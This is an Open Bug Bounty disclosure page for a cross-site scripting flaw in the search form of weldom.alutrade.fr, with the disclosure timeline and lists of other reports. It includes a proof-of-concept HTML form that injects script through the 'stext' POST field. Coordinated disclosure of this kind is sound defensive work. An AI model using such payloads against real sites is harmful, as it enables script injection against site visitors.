Report Email Alerts Open Bug Bounty: 189,013 coordinated disclosures
Total Vulnerabilities Fixed: 93,740
175,822 vulnerable websites, 16,714 VIP websites
4,267 security researchers, 5,693 notification subscribers

Open Bug Bounty ID

OBB-225375

weldom.alutrade.fr Security Vulnerability

On the 16.04.2017 security researcher xssbuddy Helped patch 319 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 2 recommendations
disclosed XSS vulnerability affecting weldom.alutrade.fr website.

On our side, we have notified website owner via all reasonable communication channels about the vulnerability, so it can be patched as quickly as possible.

Currently the vulnerability is patched and does not represent any security risk for the website or its visitors.

Vulnerability Details


weldom.alutrade.fr Description

Weldom Homepage.

Vulnerable URL:

HTTP POST data:

Research's Comment:

PoC :
<form action=http://weldom.alutrade.fr/search.asp method="POST"><input type=hidden name="posted" value="1"><input type=hidden name="sprice" value=""><input type=hidden name="stext" value="1&quot;'--!&gt;&lt;Script /K/&gt;confirm(`OPENBUGBOUNTY`)&lt;/Script /K/&gt;"><input type=hidden name="stype" value=""><input type=hidden name="scat" value=""><input type=hidden name="Search" value="Recherchez"><input type=hidden name="" value=""><input type=submit value=XSS></form>

Other details:

Patched:Yes, at 12.10.2017
Latest check for patch:12.10.2017 10:58 GMT
Vulnerability type:XSS
Vulnerability status:Publicly disclosed
Alexa RankUnknown / Not calculated
VIP website status:No
Check weldom.alutrade.fr for malware:Click here
Check weldom.alutrade.fr SSL connection:Click here (Grade: F) Refresh Results

Mirror: Click here to view the mirror

Coordinated Disclosure Timeline

Vulnerability submitted via Open Bug Bounty16 April, 2017 17:06 GMT
Vulnerability existence verified and confirmed 17 April, 2017 05:57 GMT
Vulnerability details disclosed by researcher24 April, 2017 06:14 GMT
Vulnerability patched by the website owner12 October, 2017 10:58 GMT

User Comments:

Please login via twitter to be the first one to comment.


Latest Vulnerabilities on *.weldom.alutrade.fr

OBB-ID Reported by Status Reported on
patched
16.04.2017

Latest Vulnerabilities Reported by xssbuddy

OBB-ID Vulnerability Status Reported
On Hold
12.11.2017
On Hold
12.11.2017
On Hold
09.11.2017
On Hold
09.11.2017
On Hold
09.11.2017
On Hold
29.10.2017
On Hold
26.09.2017
On Hold
26.09.2017
On Hold
25.09.2017
On Hold
25.09.2017
On Hold
25.09.2017
On Hold
24.09.2017
On Hold
23.09.2017
On Hold
22.09.2017
On Hold
22.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017


LATEST VIP SUBMISSIONS

beszamolok.com
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
novy.tv
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
gaadi.com
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
hitosara.com
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
fastcodesign.com
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
qut.edu.au
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
spielaffe.de
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
universal.org
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
dnes.bg
Reported by TAHA Helped patch 126 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 14 recommendations
on 15.12.2017
legacy.com
Reported by TAHA Helped patch 126 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 14 recommendations
on 15.12.2017



LATEST SUBMISSIONS

www3.animetv.to
Reported by huntingforbug Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 3 recommendations
on 15.12.2017
efthetos.gr
Reported by fakessh Helped patch 209 vulnerabilities
Received 4 Coordinated Disclosure badges
Received 16 recommendations
on 15.12.2017
k-addicts.net
Reported by SoKa Helped patch 15 vulnerabilities
Received 1 Coordinated Disclosure badges
on 15.12.2017
tokyomk.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
extranet.ursuliah.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
topclasscarpentry.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
g-hosting.cz
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
the60sofficialsite.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
tscprinters.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017
thekrine.com
Reported by AndreCalvinho Helped patch 95 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 4 recommendations
on 15.12.2017